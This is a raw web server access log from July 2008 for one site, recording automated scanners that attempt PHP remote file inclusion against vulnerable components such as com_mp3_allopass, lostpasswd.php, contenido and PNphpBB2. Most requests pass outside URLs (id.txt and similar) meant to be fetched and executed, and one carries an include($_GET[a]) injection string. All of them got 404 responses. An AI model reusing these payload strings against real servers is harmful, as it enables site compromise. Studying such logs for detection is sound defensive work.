217.198.149.178 - - [23/Jul/2008:07:21:53 -0700] "GET /logs/access_080629.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:07:21:53 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:07:21:54 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:22:02 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:22:02 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
62.244.71.72 - - [23/Jul/2008:07:22:50 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:24:42 -0700] "GET /lostpasswd.php?env[include_prefix]=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:24:42 -0700] "GET /lostpasswd.php?env[include_prefix]=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
195.206.98.45 - - [23/Jul/2008:07:25:04 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://doscoder.t35.com/forum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
70.84.182.98 - - [23/Jul/2008:07:25:28 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
70.84.182.98 - - [23/Jul/2008:07:25:28 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
62.244.71.72 - - [23/Jul/2008:07:25:31 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:07:25:32 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:07:25:33 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
62.244.71.72 - - [23/Jul/2008:07:25:47 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:07:25:50 -0700] "GET /logs/access_080711.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:07:26:07 -0700] "GET /logs/access_080711.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
64.13.251.55 - - [23/Jul/2008:07:26:10 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rsmu.org/data/errors/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
64.13.251.55 - - [23/Jul/2008:07:26:10 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rsmu.org/data/errors/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
64.13.251.55 - - [23/Jul/2008:07:26:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rsmu.org/data/errors/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:26:18 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:26:18 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.120.241.242 - - [23/Jul/2008:07:26:18 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1"